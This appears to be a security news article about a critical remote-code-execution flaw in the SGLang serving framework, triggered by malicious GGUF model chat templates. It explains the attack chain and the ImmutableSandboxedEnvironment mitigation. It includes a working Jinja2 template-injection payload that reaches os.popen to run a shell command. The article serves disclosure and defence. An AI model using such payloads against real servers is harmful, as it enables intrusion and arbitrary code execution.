
Critical RCE Vulnerability Rocks SGLang: Malicious AI Models Pose Severe Threat


A severe security flaw, identified as CVE-2026-5760 and carrying a critical CVSS score of 9.8, has been uncovered in SGLang, a popular open-source serving framework for large language models (LLMs) and multimodal AI. This vulnerability presents a significant risk, potentially allowing attackers to achieve remote code execution (RCE) on affected systems through specially crafted AI model files.

The Looming Threat: RCE via Malicious GGUF Models

The core of this critical vulnerability lies in a command injection flaw that enables the execution of arbitrary code. SGLang, a high-performance framework with a substantial community footprint (over 5,500 forks and 26,100 stars on GitHub), is widely used for deploying and serving advanced AI models. Its widespread adoption means the impact of this RCE flaw could be far-reaching.

How the Attack Unfolds: A Malicious Template Injection

According to an advisory from the CERT Coordination Center (CERT/CC), the vulnerability specifically targets SGLang’s /v1/rerank endpoint. An attacker can exploit this by creating a malicious GPT-Generated Unified Format (GGUF) model file. This file contains a crafted tokenizer.chat_template parameter embedded with a Jinja2 server-side template injection (SSTI) payload.

The CERT/CC elaborates: “An attacker exploits this vulnerability by creating a malicious GPT Generated Unified Format (GGUF) model file with a crafted tokenizer.chat_template parameter that contains a Jinja2 server-side template injection (SSTI) payload with a trigger phrase to activate the vulnerable code path.”

The attack chain is disturbingly straightforward:

  1. An attacker crafts a GGUF model file, embedding a malicious Jinja2 SSTI payload within its tokenizer.chat_template.
  2. This template includes a specific trigger phrase (e.g., the Qwen3 reranker trigger) designed to activate the vulnerable code path within entrypoints/openai/serving_rerank.py.
  3. A victim downloads and loads this compromised model into SGLang, potentially from public repositories like Hugging Face.
  4. When a request is made to the /v1/rerank endpoint, SGLang processes the chat_template and renders it using jinja2.Environment().
  5. Crucially, the SSTI payload executes, allowing the attacker to run arbitrary Python code on the SGLang server, thereby achieving full RCE.
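The unsandboxed rendering at the heart of steps 4 and 5 can be sketched in a few lines. This is an illustrative stand-in, not SGLang's actual code: the template string below is a classic Jinja2 SSTI payload that climbs from the built-in `cycler` global to Python's `os` module, standing in for a malicious `tokenizer.chat_template` pulled from a crafted GGUF file.

```python
# Illustrative sketch of the vulnerable pattern, NOT SGLang's actual code.
# A chat template is attacker-controlled data, yet jinja2.Environment()
# renders it with full access to Python's object graph.
from jinja2 import Environment

# Stand-in for a malicious tokenizer.chat_template: the payload walks from
# Jinja2's built-in `cycler` global to the `os` module and runs a shell command.
malicious_chat_template = (
    "{{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}"
)

env = Environment()  # unsandboxed: the vulnerable configuration
rendered = env.from_string(malicious_chat_template).render()
print(rendered.strip())  # the shell command's output: code execution achieved
```

On a vulnerable setup, the rendered output is the result of the shell command, demonstrating that whoever controls the template controls the server.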

The Technical Underbelly: Unsandboxed Jinja2 Environment

Security researcher Stuart Beck, credited with discovering and reporting this flaw, identified the root cause: SGLang’s use of jinja2.Environment() without proper sandboxing. Instead of employing the more secure ImmutableSandboxedEnvironment, the framework’s default configuration leaves it exposed. This oversight allows a malicious model to bypass security measures and execute arbitrary Python code directly on the inference server.

Echoes of Past Vulnerabilities: Llama Drama and vLLM

CVE-2026-5760 is not an isolated incident; it shares a vulnerability class with other recent, high-profile flaws in the AI ecosystem. Notably, it mirrors CVE-2024-34359, dubbed “Llama Drama” (CVSS 9.7), a critical RCE flaw in the llama_cpp_python Python package that has since been patched. Similarly, a related attack surface was addressed in vLLM late last year (CVE-2025-61620, CVSS 6.5).

These recurring vulnerabilities underscore a broader challenge in securing AI serving frameworks, particularly concerning how they handle user-provided model components and template rendering.

Mitigation: The Path to Security

The recommended mitigation is clear and urgent. CERT/CC advises: “To mitigate this vulnerability, it is recommended to use ImmutableSandboxedEnvironment instead of jinja2.Environment() to render the chat templates. This will prevent the execution of arbitrary Python code on the server.”
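A minimal sketch of the recommended fix, assuming the template string arrives from an untrusted model file: with `ImmutableSandboxedEnvironment` in place of `jinja2.Environment()`, the same SSTI payload raises a `SecurityError` instead of executing.

```python
# Sketch of the CERT/CC-recommended mitigation: render untrusted chat
# templates in a sandbox that rejects unsafe attribute access.
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# The same SSTI payload that executes under a plain jinja2.Environment():
payload = "{{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}"

env = ImmutableSandboxedEnvironment()  # blocks unsafe attribute access
try:
    env.from_string(payload).render()
    blocked = False
except SecurityError:
    # Access to double-underscore attributes such as __globals__ is rejected.
    blocked = True

print("payload blocked:", blocked)
```

The sandbox intercepts attribute lookups at render time, so legitimate chat templates (which only format messages) keep working while object-graph traversal tricks are cut off.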

As of the advisory’s release, CERT/CC had received no patch or response from SGLang during the coordination process, making immediate implementation of this mitigation crucial for users. Organizations deploying SGLang should prioritize reviewing their configurations and applying the recommended sandboxing to protect against potential exploitation.

